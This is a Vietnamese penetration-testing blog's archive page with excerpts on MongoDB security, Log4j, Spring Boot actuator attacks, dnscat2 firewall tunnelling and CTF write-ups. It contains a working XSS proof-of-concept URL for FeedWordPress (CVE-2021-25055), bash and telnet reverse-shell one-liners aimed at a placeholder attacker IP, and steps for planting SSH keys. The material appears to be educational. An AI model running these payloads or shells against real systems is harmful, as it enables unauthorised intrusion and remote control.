MongoDB là hệ quản trị cơ sở dữ liệu rất hiệu quả, tuy nhiên còn nhiều cấu hình mặc định và cần kết hợp các yếu tố bảo mật bên ngoài thì mới đảm bảo an ninh, an toàn cho hệ thống cơ sở dữ liệu. Sau đây tôi xin chém gió một loại điểmContinueContinue reading “Bảo mật cho Mongo DB toàn tập”
Author Archives: Nhat Truong
[CVE-2021-25055] FeedWordPress < 2022.0123- Cross-Site Scripting (Authenticated)
# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: http://localhost/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&visibility='”><img+src=2+onerror=alert(origin)>
DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI
Telerik là một công ty Bungari cung cấp các công cụ phần mềm (UI) cho web, điện thoại di động, phát triển ứng dụng máy tính để bàn, các công cụ và dịch vụ thuê bao cho cross-platform phát triển ứng dụng. Telerik UI là một thư viện phổ biến chuyên phát triển giao diệnContinueContinue reading “DANH SÁCH LỖ HỔNG NGHIÊM TRỌNG của TELERIK UI”
Spring Boot Actuators attacks
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Spring Boot là một framework mạnh mẽ giúp phát triển ứng dụng web dễ dàng và hiệu quả.ContinueContinue reading “Spring Boot Actuators attacks”
Abusing SSH Access using private keys
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Create ssh-keygen file ssh-keygen Step 2: Copy file id_rsa to /ftp_home/.ssh/authorized_keys via FTP or someway 🙂ContinueContinue reading “Abusing SSH Access using private keys”
Using dnscat2 for tunneling bypass Firewall Outbound
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Step 1: Check outbound internet availability Step 2: Install dnscat2 by your way (Use this if you don’tContinueContinue reading “Using dnscat2 for tunneling bypass Firewall Outbound”
Lỗ hổng Log4j CVE-2021-44228
Giới thiệu Gần đây, một lỗ hổng phần mềm rất nghiêm trọng đã được công bố. Nó có mã định danh CVE-2021-44228 (log4shell). Lỗ hổng đã làm cộng đồng nghiên cứu bảo mật nói chung và cộng đồng những nhà phát triển Java nói riêng dậy sóng. Nguyênnhân nằm ở sự phổ biến của thưContinueContinue reading “Lỗ hổng Log4j CVE-2021-44228”
[Write-up] DamCTF 2021: web/bouncy-box
link: https://damctf.xyz/challs Ban đầu đây là 1 trò chơi, khi các bạn thua cuộc sẽ hiện ra khung đăng nhập tiếp sau đó khi ấn vào phần Scoreboard các bạn sẽ thấy hiện ra bảng xếp hạng, điều đặc việt ở đây là có 2 thành viên vip Nhìn vào đây mình đã nghĩ là chắcContinueContinue reading “[Write-up] DamCTF 2021: web/bouncy-box”
[Write-Up] Cookie Arena Session 1 (Web)
link: https://season1.cookiearena.org/challenges Web basic Hân Hoan Với bài này, để ý đề bài các bạn sẽ biết rằng bài này có liên quan đến cookie giờ thì xem nó có gì đặc biệt nào. Sau khi nhập linh tinh để đăng nhập thì mình nhận được 2 dòng này. Giờ mở cookie lên trong phần ApplicationContinueContinue reading “[Write-Up] Cookie Arena Session 1 (Web)”
Reverse Shell Cheat Sheet (Backconnect)
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Bash Reverse Shell bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 Telnet Reverse Shell telnet ATTACKING-IP 80 | /bin/bash | telnetContinueContinue reading “Reverse Shell Cheat Sheet (Backconnect)”
Nhat Truong Blog 